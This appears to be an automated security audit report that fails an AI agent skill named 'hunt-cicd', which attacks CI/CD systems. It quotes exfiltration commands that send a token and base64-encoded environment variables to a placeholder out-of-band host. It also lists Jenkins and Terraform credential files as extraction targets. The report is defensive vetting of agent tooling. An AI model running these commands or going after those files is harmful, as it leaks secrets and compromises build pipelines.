hunt-cicd
Fail
Audited by Gen Agent Trust Hub on Jul 31, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONCREDENTIALS_UNSAFE
Full Analysis
- [COMMAND_EXECUTION]: The skill contains complex shell scripts designed to automate the probing of Jenkins instances, GitHub Actions workflows, and Terraform state storage. It uses
curl,grep,jq, andghto programmatically interact with remote services and local configuration files. - [DATA_EXFILTRATION]: Instructions include patterns for exfiltrating sensitive data, such as
GITHUB_TOKENand environment variables, to external OOB (out-of-band) listeners. Evidence includes the use of placeholders likex.<COLLAB>in commands such ascurl "https://x.<COLLAB>/?t=$T"andcurl "https://x.<COLLAB>/?d=$(printenv | base64 -w0)". - [REMOTE_CODE_EXECUTION]: The skill provides ready-to-use payloads for the Jenkins Script Console and exploitation instructions for GitHub Actions template injections (
${{ }}-into-shell). It also suggests executing external Java JAR files (jenkins-cli.jar) downloaded from target instances. - [CREDENTIALS_UNSAFE]: The skill specifically targets the extraction of sensitive files and credentials, including Jenkins
secret.key,master.key, andcredentials.xml, as well as plaintext credentials, private keys, and API tokens stored interraform.tfstatefiles.
Recommendations
- AI detected serious security threats
Audit Metadata